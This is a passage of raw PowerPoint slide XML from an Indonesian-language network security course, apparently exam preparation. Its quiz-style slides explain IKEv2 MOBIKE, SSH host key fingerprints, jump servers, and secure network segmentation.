              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cepat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efisien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>MOBIKE (Mobility and Multihoming)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> VPN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meski</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pindah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Wi-Fi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> 4G).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>stabil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hemat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> bandwidth.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>4. What value confirms the identity of an SSH server to a client?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>The server’s public host key (fingerprint).</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dirty="0"/>
              <a:t>Saat client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali connect </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SSH server, server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>host key</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> fingerprint (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biasanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di ~/.ssh/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>known_hosts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Jika di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikutnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> host key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, client </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peringatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>serangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> man-in-the-middle.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>5. Server A is configured to forward commands over SSH to a pool of database servers. The database servers do not accept SSH connections from any other source. What type of configuration does Server A implement?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>👉 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jawaban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Jump server (bastion host).</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b="1" dirty="0"/>
              <a:t>Jump server/bastion host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> = server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perantara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sensitif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Hanya Server A yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> database servers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650" lvl="1" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Server A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dulu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> forward commands </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Ini </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meningkatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jalur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</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124</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17747549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Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memahami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penggunaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segmentasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>topologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbasis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memilih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesuai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lokasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyebaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melindungi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>skenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Panduan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Perusahaan yang Aman </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Ikuti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>panduan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Anda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menerapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>desain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diperluas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Mengidentifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bisnis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan server, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>klien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>protokol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukungnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Rancang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> zona </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>blok</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersegmentasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendukung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>persyaratan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
